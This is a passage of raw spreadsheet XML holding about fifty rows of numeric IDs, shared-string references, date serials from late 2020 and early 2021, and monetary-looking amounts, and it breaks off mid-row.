    <row r="2701" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2701">
        <v>22481</v>
      </c>
      <c r="B2701">
        <v>1216</v>
      </c>
      <c r="C2701" t="s">
        <v>3601</v>
      </c>
      <c r="D2701" t="s">
        <v>12069</v>
      </c>
      <c r="E2701">
        <v>12</v>
      </c>
      <c r="F2701" t="s">
        <v>3686</v>
      </c>
      <c r="G2701" s="1">
        <v>44188</v>
      </c>
      <c r="H2701">
        <v>200000</v>
      </c>
      <c r="I2701" t="s">
        <v>12070</v>
      </c>
    </row>
    <row r="2702" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2702">
        <v>22482</v>
      </c>
      <c r="B2702">
        <v>2591</v>
      </c>
      <c r="C2702" t="s">
        <v>4977</v>
      </c>
      <c r="D2702" t="s">
        <v>12071</v>
      </c>
      <c r="E2702">
        <v>16</v>
      </c>
      <c r="F2702" t="s">
        <v>8295</v>
      </c>
      <c r="G2702" s="1">
        <v>44116</v>
      </c>
      <c r="H2702">
        <v>1000</v>
      </c>
      <c r="I2702" t="s">
        <v>12072</v>
      </c>
    </row>
    <row r="2703" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2703">
        <v>22501</v>
      </c>
      <c r="B2703">
        <v>4860</v>
      </c>
      <c r="C2703" t="s">
        <v>7711</v>
      </c>
      <c r="D2703" t="s">
        <v>12073</v>
      </c>
      <c r="E2703">
        <v>23</v>
      </c>
      <c r="F2703" t="s">
        <v>12074</v>
      </c>
      <c r="G2703" s="1">
        <v>44098</v>
      </c>
      <c r="H2703">
        <v>36000</v>
      </c>
      <c r="J2703" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2704" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2704">
        <v>22502</v>
      </c>
      <c r="B2704">
        <v>4860</v>
      </c>
      <c r="C2704" t="s">
        <v>7711</v>
      </c>
      <c r="D2704" t="s">
        <v>12073</v>
      </c>
      <c r="E2704">
        <v>23</v>
      </c>
      <c r="F2704" t="s">
        <v>9642</v>
      </c>
      <c r="G2704" s="1">
        <v>44098</v>
      </c>
      <c r="H2704">
        <v>12000</v>
      </c>
      <c r="J2704" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2705" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2705">
        <v>22504</v>
      </c>
      <c r="B2705">
        <v>1536</v>
      </c>
      <c r="C2705" t="s">
        <v>2718</v>
      </c>
      <c r="D2705" t="s">
        <v>10126</v>
      </c>
      <c r="E2705">
        <v>14</v>
      </c>
      <c r="F2705" t="s">
        <v>12075</v>
      </c>
      <c r="G2705" s="1">
        <v>44102</v>
      </c>
      <c r="H2705">
        <v>50000</v>
      </c>
      <c r="J2705" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="2706" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2706">
        <v>22505</v>
      </c>
      <c r="B2706">
        <v>4995</v>
      </c>
      <c r="C2706" t="s">
        <v>7703</v>
      </c>
      <c r="D2706" t="s">
        <v>12076</v>
      </c>
      <c r="E2706">
        <v>14</v>
      </c>
      <c r="F2706" t="s">
        <v>385</v>
      </c>
      <c r="G2706" s="1">
        <v>44152</v>
      </c>
      <c r="H2706">
        <v>300000</v>
      </c>
      <c r="I2706" t="s">
        <v>9550</v>
      </c>
      <c r="J2706" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2707" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2707">
        <v>22506</v>
      </c>
      <c r="B2707">
        <v>4995</v>
      </c>
      <c r="C2707" t="s">
        <v>7703</v>
      </c>
      <c r="D2707" t="s">
        <v>12076</v>
      </c>
      <c r="E2707">
        <v>14</v>
      </c>
      <c r="F2707" t="s">
        <v>9561</v>
      </c>
      <c r="G2707" s="1">
        <v>44152</v>
      </c>
      <c r="H2707">
        <v>300000</v>
      </c>
      <c r="I2707" t="s">
        <v>9746</v>
      </c>
      <c r="J2707" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2708" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2708">
        <v>22507</v>
      </c>
      <c r="B2708">
        <v>4995</v>
      </c>
      <c r="C2708" t="s">
        <v>7703</v>
      </c>
      <c r="D2708" t="s">
        <v>12076</v>
      </c>
      <c r="E2708">
        <v>14</v>
      </c>
      <c r="F2708" t="s">
        <v>12077</v>
      </c>
      <c r="G2708" s="1">
        <v>44152</v>
      </c>
      <c r="H2708">
        <v>15000</v>
      </c>
      <c r="I2708" t="s">
        <v>9746</v>
      </c>
    </row>
    <row r="2709" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2709">
        <v>22508</v>
      </c>
      <c r="B2709">
        <v>4995</v>
      </c>
      <c r="C2709" t="s">
        <v>7703</v>
      </c>
      <c r="D2709" t="s">
        <v>12076</v>
      </c>
      <c r="E2709">
        <v>14</v>
      </c>
      <c r="F2709" t="s">
        <v>12078</v>
      </c>
      <c r="G2709" s="1">
        <v>44152</v>
      </c>
      <c r="H2709">
        <v>15000</v>
      </c>
      <c r="I2709" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2710" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2710">
        <v>22520</v>
      </c>
      <c r="B2710">
        <v>518</v>
      </c>
      <c r="C2710" t="s">
        <v>16313</v>
      </c>
      <c r="D2710" t="s">
        <v>16447</v>
      </c>
      <c r="E2710">
        <v>16</v>
      </c>
      <c r="F2710" t="s">
        <v>1651</v>
      </c>
      <c r="G2710" s="1">
        <v>44193</v>
      </c>
      <c r="H2710" s="4">
        <v>4786880</v>
      </c>
      <c r="I2710" t="s">
        <v>12080</v>
      </c>
      <c r="J2710" t="s">
        <v>12081</v>
      </c>
    </row>
    <row r="2711" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2711">
        <v>22521</v>
      </c>
      <c r="B2711">
        <v>518</v>
      </c>
      <c r="C2711" t="s">
        <v>16313</v>
      </c>
      <c r="D2711" t="s">
        <v>16447</v>
      </c>
      <c r="E2711">
        <v>16</v>
      </c>
      <c r="F2711" t="s">
        <v>945</v>
      </c>
      <c r="G2711" s="1">
        <v>44193</v>
      </c>
      <c r="H2711" s="4">
        <v>630000</v>
      </c>
      <c r="I2711" t="s">
        <v>12082</v>
      </c>
      <c r="J2711" t="s">
        <v>12083</v>
      </c>
    </row>
    <row r="2712" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2712">
        <v>22522</v>
      </c>
      <c r="B2712">
        <v>518</v>
      </c>
      <c r="C2712" t="s">
        <v>1185</v>
      </c>
      <c r="D2712" t="s">
        <v>12079</v>
      </c>
      <c r="E2712">
        <v>16</v>
      </c>
      <c r="F2712" t="s">
        <v>3326</v>
      </c>
      <c r="G2712" s="1">
        <v>44193</v>
      </c>
      <c r="H2712">
        <v>3500</v>
      </c>
      <c r="I2712" t="s">
        <v>12084</v>
      </c>
    </row>
    <row r="2713" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2713">
        <v>22523</v>
      </c>
      <c r="B2713">
        <v>4806</v>
      </c>
      <c r="C2713" t="s">
        <v>7719</v>
      </c>
      <c r="D2713" t="s">
        <v>12085</v>
      </c>
      <c r="E2713">
        <v>14</v>
      </c>
      <c r="F2713" t="s">
        <v>12086</v>
      </c>
      <c r="G2713" s="1">
        <v>44259</v>
      </c>
      <c r="H2713">
        <v>1000000</v>
      </c>
      <c r="I2713" t="s">
        <v>12087</v>
      </c>
      <c r="J2713" t="s">
        <v>12088</v>
      </c>
    </row>
    <row r="2714" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2714">
        <v>22524</v>
      </c>
      <c r="B2714">
        <v>4806</v>
      </c>
      <c r="C2714" t="s">
        <v>7719</v>
      </c>
      <c r="D2714" t="s">
        <v>12085</v>
      </c>
      <c r="E2714">
        <v>14</v>
      </c>
      <c r="F2714" t="s">
        <v>12089</v>
      </c>
      <c r="G2714" s="1">
        <v>44259</v>
      </c>
      <c r="H2714">
        <v>1000000</v>
      </c>
      <c r="I2714" t="s">
        <v>12090</v>
      </c>
      <c r="J2714" t="s">
        <v>12091</v>
      </c>
    </row>
    <row r="2715" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2715">
        <v>22525</v>
      </c>
      <c r="B2715">
        <v>4806</v>
      </c>
      <c r="C2715" t="s">
        <v>7719</v>
      </c>
      <c r="D2715" t="s">
        <v>12085</v>
      </c>
      <c r="E2715">
        <v>14</v>
      </c>
      <c r="F2715" t="s">
        <v>9437</v>
      </c>
      <c r="G2715" s="1">
        <v>44259</v>
      </c>
      <c r="H2715">
        <v>1000000</v>
      </c>
      <c r="I2715" t="s">
        <v>12092</v>
      </c>
      <c r="J2715" t="s">
        <v>12091</v>
      </c>
    </row>
    <row r="2716" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2716">
        <v>22526</v>
      </c>
      <c r="B2716">
        <v>2608</v>
      </c>
      <c r="C2716" t="s">
        <v>16341</v>
      </c>
      <c r="D2716" t="s">
        <v>16342</v>
      </c>
      <c r="E2716">
        <v>2</v>
      </c>
      <c r="F2716" t="s">
        <v>12093</v>
      </c>
      <c r="G2716" s="1">
        <v>44120</v>
      </c>
      <c r="H2716" s="4">
        <v>52000</v>
      </c>
      <c r="J2716" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2717" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2717">
        <v>22527</v>
      </c>
      <c r="B2717">
        <v>2608</v>
      </c>
      <c r="C2717" t="s">
        <v>5292</v>
      </c>
      <c r="D2717" t="s">
        <v>10088</v>
      </c>
      <c r="E2717">
        <v>2</v>
      </c>
      <c r="F2717" t="s">
        <v>12094</v>
      </c>
      <c r="G2717" s="1">
        <v>44120</v>
      </c>
      <c r="H2717">
        <v>482400</v>
      </c>
      <c r="J2717" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2718" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2718">
        <v>22528</v>
      </c>
      <c r="B2718">
        <v>2608</v>
      </c>
      <c r="C2718" t="s">
        <v>16341</v>
      </c>
      <c r="D2718" t="s">
        <v>16342</v>
      </c>
      <c r="E2718">
        <v>2</v>
      </c>
      <c r="F2718" t="s">
        <v>12095</v>
      </c>
      <c r="G2718" s="1">
        <v>44120</v>
      </c>
      <c r="H2718" s="4">
        <v>192000</v>
      </c>
      <c r="J2718" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2719" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2719">
        <v>22529</v>
      </c>
      <c r="B2719">
        <v>2608</v>
      </c>
      <c r="C2719" t="s">
        <v>16341</v>
      </c>
      <c r="D2719" t="s">
        <v>16342</v>
      </c>
      <c r="E2719">
        <v>2</v>
      </c>
      <c r="F2719" t="s">
        <v>945</v>
      </c>
      <c r="G2719" s="1">
        <v>44120</v>
      </c>
      <c r="H2719" s="4">
        <v>355200</v>
      </c>
      <c r="J2719" t="s">
        <v>12096</v>
      </c>
    </row>
    <row r="2720" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2720">
        <v>22530</v>
      </c>
      <c r="B2720">
        <v>2608</v>
      </c>
      <c r="C2720" t="s">
        <v>16341</v>
      </c>
      <c r="D2720" t="s">
        <v>16342</v>
      </c>
      <c r="E2720">
        <v>2</v>
      </c>
      <c r="F2720" t="s">
        <v>12097</v>
      </c>
      <c r="G2720" s="1">
        <v>44120</v>
      </c>
      <c r="H2720" s="4">
        <v>148000</v>
      </c>
      <c r="J2720" t="s">
        <v>12098</v>
      </c>
    </row>
    <row r="2721" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2721">
        <v>22531</v>
      </c>
      <c r="B2721">
        <v>2608</v>
      </c>
      <c r="C2721" t="s">
        <v>16341</v>
      </c>
      <c r="D2721" t="s">
        <v>16342</v>
      </c>
      <c r="E2721">
        <v>2</v>
      </c>
      <c r="F2721" t="s">
        <v>4062</v>
      </c>
      <c r="G2721" s="1">
        <v>44120</v>
      </c>
      <c r="H2721" s="4">
        <v>3000000</v>
      </c>
      <c r="J2721" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="2722" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2722">
        <v>22532</v>
      </c>
      <c r="B2722">
        <v>755</v>
      </c>
      <c r="C2722" t="s">
        <v>1975</v>
      </c>
      <c r="D2722" t="s">
        <v>12099</v>
      </c>
      <c r="E2722">
        <v>1</v>
      </c>
      <c r="F2722" t="s">
        <v>9217</v>
      </c>
      <c r="G2722" s="1">
        <v>44253</v>
      </c>
      <c r="H2722">
        <v>0</v>
      </c>
      <c r="J2722" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2723" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2723">
        <v>22533</v>
      </c>
      <c r="B2723">
        <v>755</v>
      </c>
      <c r="C2723" t="s">
        <v>1975</v>
      </c>
      <c r="D2723" t="s">
        <v>12099</v>
      </c>
      <c r="E2723">
        <v>1</v>
      </c>
      <c r="F2723" t="s">
        <v>3814</v>
      </c>
      <c r="G2723" s="1">
        <v>44253</v>
      </c>
      <c r="H2723">
        <v>0</v>
      </c>
      <c r="J2723" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2724" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2724">
        <v>22534</v>
      </c>
      <c r="B2724">
        <v>755</v>
      </c>
      <c r="C2724" t="s">
        <v>1975</v>
      </c>
      <c r="D2724" t="s">
        <v>12099</v>
      </c>
      <c r="E2724">
        <v>1</v>
      </c>
      <c r="F2724" t="s">
        <v>7057</v>
      </c>
      <c r="G2724" s="1">
        <v>44253</v>
      </c>
      <c r="H2724">
        <v>0</v>
      </c>
      <c r="J2724" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2725" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2725">
        <v>22535</v>
      </c>
      <c r="B2725">
        <v>4948</v>
      </c>
      <c r="C2725" t="s">
        <v>7724</v>
      </c>
      <c r="D2725" t="s">
        <v>12100</v>
      </c>
      <c r="E2725">
        <v>13</v>
      </c>
      <c r="F2725" t="s">
        <v>12101</v>
      </c>
      <c r="G2725" s="1">
        <v>44207</v>
      </c>
      <c r="H2725">
        <v>21000</v>
      </c>
      <c r="I2725" t="s">
        <v>12102</v>
      </c>
      <c r="J2725" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2726" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2726">
        <v>22536</v>
      </c>
      <c r="B2726">
        <v>174</v>
      </c>
      <c r="C2726" t="s">
        <v>1828</v>
      </c>
      <c r="D2726" t="s">
        <v>11710</v>
      </c>
      <c r="E2726">
        <v>13</v>
      </c>
      <c r="F2726" t="s">
        <v>385</v>
      </c>
      <c r="G2726" s="1">
        <v>44106</v>
      </c>
      <c r="H2726">
        <v>30000</v>
      </c>
      <c r="J2726" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2727" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2727">
        <v>22537</v>
      </c>
      <c r="B2727">
        <v>4862</v>
      </c>
      <c r="C2727" t="s">
        <v>7400</v>
      </c>
      <c r="D2727" t="s">
        <v>12103</v>
      </c>
      <c r="E2727">
        <v>2</v>
      </c>
      <c r="F2727" t="s">
        <v>7057</v>
      </c>
      <c r="G2727" s="1">
        <v>44145</v>
      </c>
      <c r="H2727">
        <v>450000</v>
      </c>
      <c r="J2727" t="s">
        <v>12104</v>
      </c>
    </row>
    <row r="2728" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2728">
        <v>22538</v>
      </c>
      <c r="B2728">
        <v>1265</v>
      </c>
      <c r="C2728" t="s">
        <v>3607</v>
      </c>
      <c r="D2728" t="s">
        <v>12046</v>
      </c>
      <c r="E2728">
        <v>29</v>
      </c>
      <c r="F2728" t="s">
        <v>4686</v>
      </c>
      <c r="G2728" s="1">
        <v>44126</v>
      </c>
      <c r="H2728">
        <v>600</v>
      </c>
      <c r="J2728" t="s">
        <v>12105</v>
      </c>
    </row>
    <row r="2729" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2729">
        <v>22539</v>
      </c>
      <c r="B2729">
        <v>4831</v>
      </c>
      <c r="C2729" t="s">
        <v>7465</v>
      </c>
      <c r="D2729" t="s">
        <v>11775</v>
      </c>
      <c r="E2729">
        <v>16</v>
      </c>
      <c r="F2729" t="s">
        <v>9586</v>
      </c>
      <c r="G2729" s="1">
        <v>44106</v>
      </c>
      <c r="H2729">
        <v>100</v>
      </c>
      <c r="I2729" t="s">
        <v>9738</v>
      </c>
    </row>
    <row r="2730" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2730">
        <v>22540</v>
      </c>
      <c r="B2730">
        <v>4831</v>
      </c>
      <c r="C2730" t="s">
        <v>7465</v>
      </c>
      <c r="D2730" t="s">
        <v>11775</v>
      </c>
      <c r="E2730">
        <v>16</v>
      </c>
      <c r="F2730" t="s">
        <v>9610</v>
      </c>
      <c r="G2730" s="1">
        <v>44106</v>
      </c>
      <c r="H2730">
        <v>100</v>
      </c>
      <c r="I2730" t="s">
        <v>9738</v>
      </c>
    </row>
    <row r="2731" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2731">
        <v>22542</v>
      </c>
      <c r="B2731">
        <v>491</v>
      </c>
      <c r="C2731" t="s">
        <v>1838</v>
      </c>
      <c r="D2731" t="s">
        <v>12106</v>
      </c>
      <c r="E2731">
        <v>11</v>
      </c>
      <c r="F2731" t="s">
        <v>673</v>
      </c>
      <c r="G2731" s="1">
        <v>44176</v>
      </c>
      <c r="H2731">
        <v>1878000</v>
      </c>
      <c r="J2731" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="2732" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2732">
        <v>22543</v>
      </c>
      <c r="B2732">
        <v>491</v>
      </c>
      <c r="C2732" t="s">
        <v>1838</v>
      </c>
      <c r="D2732" t="s">
        <v>12106</v>
      </c>
      <c r="E2732">
        <v>11</v>
      </c>
      <c r="F2732" t="s">
        <v>9441</v>
      </c>
      <c r="G2732" s="1">
        <v>44176</v>
      </c>
      <c r="H2732">
        <v>119000</v>
      </c>
      <c r="J2732" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="2733" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2733">
        <v>22544</v>
      </c>
      <c r="B2733">
        <v>491</v>
      </c>
      <c r="C2733" t="s">
        <v>1838</v>
      </c>
      <c r="D2733" t="s">
        <v>12106</v>
      </c>
      <c r="E2733">
        <v>11</v>
      </c>
      <c r="F2733" t="s">
        <v>10007</v>
      </c>
      <c r="G2733" s="1">
        <v>44176</v>
      </c>
      <c r="H2733">
        <v>15000</v>
      </c>
      <c r="J2733" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="2734" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2734">
        <v>22545</v>
      </c>
      <c r="B2734">
        <v>660</v>
      </c>
      <c r="C2734" t="s">
        <v>16448</v>
      </c>
      <c r="D2734" t="s">
        <v>16449</v>
      </c>
      <c r="E2734">
        <v>16</v>
      </c>
      <c r="F2734" t="s">
        <v>12107</v>
      </c>
      <c r="G2734" s="1">
        <v>44232</v>
      </c>
      <c r="H2734" s="4">
        <v>600000</v>
      </c>
      <c r="J2734" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2735" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2735">
        <v>22546</v>
      </c>
      <c r="B2735">
        <v>660</v>
      </c>
      <c r="C2735" t="s">
        <v>16448</v>
      </c>
      <c r="D2735" t="s">
        <v>16449</v>
      </c>
      <c r="E2735">
        <v>16</v>
      </c>
      <c r="F2735" t="s">
        <v>3326</v>
      </c>
      <c r="G2735" s="1">
        <v>44232</v>
      </c>
      <c r="H2735" s="4">
        <v>400000</v>
      </c>
      <c r="J2735" t="s">
        <v>12108</v>
      </c>
    </row>
    <row r="2736" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2736">
        <v>22547</v>
      </c>
      <c r="B2736">
        <v>660</v>
      </c>
      <c r="C2736" t="s">
        <v>16448</v>
      </c>
      <c r="D2736" t="s">
        <v>16449</v>
      </c>
      <c r="E2736">
        <v>16</v>
      </c>
      <c r="F2736" t="s">
        <v>12094</v>
      </c>
      <c r="G2736" s="1">
        <v>44232</v>
      </c>
      <c r="H2736" s="4">
        <v>10000</v>
      </c>
      <c r="J2736" t="s">
        <v>12109</v>
      </c>
    </row>
    <row r="2737" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2737">
        <v>22548</v>
      </c>
      <c r="B2737">
        <v>660</v>
      </c>
      <c r="C2737" t="s">
        <v>16448</v>
      </c>
      <c r="D2737" t="s">
        <v>16449</v>
      </c>
      <c r="E2737">
        <v>16</v>
      </c>
      <c r="F2737" t="s">
        <v>9435</v>
      </c>
      <c r="G2737" s="1">
        <v>44232</v>
      </c>
      <c r="H2737" s="4">
        <v>2000</v>
      </c>
      <c r="J2737" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2738" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2738">
        <v>22549</v>
      </c>
      <c r="B2738">
        <v>660</v>
      </c>
      <c r="C2738" t="s">
        <v>16448</v>
      </c>
      <c r="D2738" t="s">
        <v>16449</v>
      </c>
      <c r="E2738">
        <v>16</v>
      </c>
      <c r="F2738" t="s">
        <v>9670</v>
      </c>
      <c r="G2738" s="1">
        <v>44232</v>
      </c>
      <c r="H2738" s="4">
        <v>100000</v>
      </c>
      <c r="J2738" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2739" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2739">
        <v>22550</v>
      </c>
      <c r="B2739">
        <v>660</v>
      </c>
      <c r="C2739" t="s">
        <v>16448</v>
      </c>
      <c r="D2739" t="s">
        <v>16449</v>
      </c>
      <c r="E2739">
        <v>16</v>
      </c>
      <c r="F2739" t="s">
        <v>12093</v>
      </c>
      <c r="G2739" s="1">
        <v>44232</v>
      </c>
      <c r="H2739" s="4">
        <v>1500000</v>
      </c>
      <c r="J2739" t="s">
        <v>12110</v>
      </c>
    </row>
    <row r="2740" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2740">
        <v>22551</v>
      </c>
      <c r="B2740">
        <v>660</v>
      </c>
      <c r="C2740" t="s">
        <v>16448</v>
      </c>
      <c r="D2740" t="s">
        <v>16449</v>
      </c>
      <c r="E2740">
        <v>16</v>
      </c>
      <c r="F2740" t="s">
        <v>12111</v>
      </c>
      <c r="G2740" s="1">
        <v>44232</v>
      </c>
      <c r="H2740" s="4">
        <v>150000</v>
      </c>
      <c r="J2740" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="2741" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2741">
        <v>22552</v>
      </c>
      <c r="B2741">
        <v>1142</v>
      </c>
      <c r="C2741" t="s">
        <v>3579</v>
      </c>
      <c r="D2741" t="s">
        <v>12112</v>
      </c>
      <c r="E2741">
        <v>16</v>
      </c>
      <c r="F2741" t="s">
        <v>547</v>
      </c>
      <c r="G2741" s="1">
        <v>44230</v>
      </c>
      <c r="H2741">
        <v>232471</v>
      </c>
      <c r="J2741" t="s">
        <v>12113</v>
      </c>
    </row>
    <row r="2742" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2742">
        <v>22553</v>
      </c>
      <c r="B2742">
        <v>1142</v>
      </c>
      <c r="C2742" t="s">
        <v>3579</v>
      </c>
      <c r="D2742" t="s">
        <v>12112</v>
      </c>
      <c r="E2742">
        <v>16</v>
      </c>
      <c r="F2742" t="s">
        <v>364</v>
      </c>
      <c r="G2742" s="1">
        <v>44230</v>
      </c>
      <c r="H2742">
        <v>1788887</v>
      </c>
      <c r="J2742" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2743" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2743">
        <v>22554</v>
      </c>
      <c r="B2743">
        <v>4998</v>
      </c>
      <c r="C2743" t="s">
        <v>16450</v>
      </c>
      <c r="D2743" t="s">
        <v>16451</v>
      </c>
      <c r="E2743">
        <v>27</v>
      </c>
      <c r="F2743" t="s">
        <v>11027</v>
      </c>
      <c r="G2743" s="1">
        <v>44131</v>
      </c>
      <c r="H2743" s="4">
        <v>240000</v>
      </c>
      <c r="I2743" t="s">
        <v>10010</v>
      </c>
      <c r="J2743" t="s">
        <v>12114</v>
      </c>
    </row>
    <row r="2744" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2744">
        <v>22555</v>
      </c>
      <c r="B2744">
        <v>4998</v>
      </c>
      <c r="C2744" t="s">
        <v>16450</v>
      </c>
      <c r="D2744" t="s">
        <v>16451</v>
      </c>
      <c r="E2744">
        <v>27</v>
      </c>
      <c r="F2744" t="s">
        <v>9435</v>
      </c>
      <c r="G2744" s="1">
        <v>44131</v>
      </c>
      <c r="H2744" s="4">
        <v>60000</v>
      </c>
      <c r="I2744" t="s">
        <v>10010</v>
      </c>
      <c r="J2744" t="s">
        <v>12115</v>
      </c>
    </row>
    <row r="2745" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2745">
        <v>22556</v>
      </c>
      <c r="B2745">
        <v>4998</v>
      </c>
      <c r="C2745" t="s">
        <v>16450</v>
      </c>
      <c r="D2745" t="s">
        <v>16451</v>
      </c>
      <c r="E2745">
        <v>27</v>
      </c>
      <c r="F2745" t="s">
        <v>10840</v>
      </c>
      <c r="G2745" s="1">
        <v>44131</v>
      </c>
      <c r="H2745" s="4">
        <v>240000</v>
      </c>
      <c r="I2745" t="s">
        <v>10010</v>
      </c>
      <c r="J2745" t="s">
        <v>12115</v>
      </c>
    </row>
    <row r="2746" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2746">
        <v>22557</v>
      </c>
      <c r="B2746">
        <v>4998</v>
      </c>
      <c r="C2746" t="s">
        <v>16450</v>
      </c>
      <c r="D2746" t="s">
        <v>16451</v>
      </c>
      <c r="E2746">
        <v>27</v>
      </c>
      <c r="F2746" t="s">
        <v>2236</v>
      </c>
      <c r="G2746" s="1">
        <v>44131</v>
      </c>
      <c r="H2746" s="4">
        <v>84000</v>
      </c>
      <c r="I2746" t="s">
        <v>10010</v>
      </c>
      <c r="J2746" t="s">
        <v>12115</v>
      </c>
    </row>
    <row r="2747" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2747">
        <v>22559</v>
      </c>
      <c r="B2747">
        <v>1182</v>
      </c>
      <c r="C2747" t="s">
        <v>3535</v>
      </c>
      <c r="D2747" t="s">
        <v>12116</v>
      </c>
      <c r="E2747">
        <v>16</v>
      </c>
      <c r="F2747" t="s">
        <v>2407</v>
      </c>
      <c r="G2747" s="1">
        <v>44137</v>
      </c>
      <c r="H2747">
        <v>250000</v>
      </c>
      <c r="J2747" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2748" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2748">
        <v>22561</v>
      </c>
      <c r="B2748">
        <v>4796</v>
      </c>
      <c r="C2748" t="s">
        <v>7642</v>
      </c>
      <c r="D2748" t="s">
        <v>11953</v>
      </c>
      <c r="E2748">
        <v>2</v>
      </c>
      <c r="F2748" t="s">
        <v>9642</v>
      </c>
      <c r="G2748" s="1">
        <v>44097</v>
      </c>
      <c r="H2748">
        <v>2500</v>
      </c>
      <c r="I2748" t="s">
        <v>9603</v>
      </c>
      <c r="J2748" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="2749" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2749">
        <v>22562</v>
      </c>
      <c r="B2749">
        <v>4796</v>
      </c>
      <c r="C2749" t="s">
        <v>7642</v>
      </c>
      <c r="D2749" t="s">
        <v>11953</v>
      </c>
      <c r="E2749">
        <v>2</v>
      </c>
      <c r="F2749" t="s">
        <v>9435</v>
      </c>
      <c r="G2749" s="1">
        <v>44097</v>
      </c>
      <c r="H2749">
        <v>5000</v>
      </c>
      <c r="J2749" t="s">
        <v>11024</v>
      </c>
    </row>
    <row r="2750" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2750">
        <v>22563</v>
      </c>
      <c r="B2750">
        <v>1003</v>
      </c>
      <c r="C2750" t="s">
        <v>3633</v>
      </c>
      <c r="D2750" t="s">
        <v>12118</v>
      </c>
      <c r="E2750">
        <v>16</v>
      </c>
      <c r="F2750" t="s">
        <v>547</v>
      </c>
      <c r="G2750" s="1">
        <v>44155</v>
      </c>
      <c r="H2750">
        <v>500</v>
      </c>
      <c r="I2750" t="s">
        <v>9522</v>
      </c>
      <c r="J2750" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2751" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2751">
        <v>22564</v>
      </c>
      <c r="B2751">
        <v>1003</v>
      </c>
      <c r="C2751" t="s">
        <v>3633</v>
      </c>
      <c r="D2751" t="s">
        <v>12118</v>
      </c>
      <c r="E2751">
        <v>16</v>
      </c>
      <c r="F2751" t="s">
        <v>9453</v>
      </c>
      <c r="G2751" s="1">
        <v>44155</v>
      </c>
      <c r="H2751">
        <v>300</v>
      </c>
      <c r="I2751" t="s">
        <v>9522</v>
      </c>
      <c r="J2751" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2752" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2752">
        <v>22565</v>
      </c>
      <c r="B2752">
        <v>1003</v>
      </c>
      <c r="C2752" t="s">
        <v>3633</v>
      </c>
      <c r="D2752" t="s">
        <v>12118</v>
      </c>
      <c r="E2752">
        <v>16</v>
      </c>
      <c r="F2752" t="s">
        <v>11554</v>
      </c>
      <c r="G2752" s="1">
        <v>44155</v>
      </c>
      <c r="H2752">
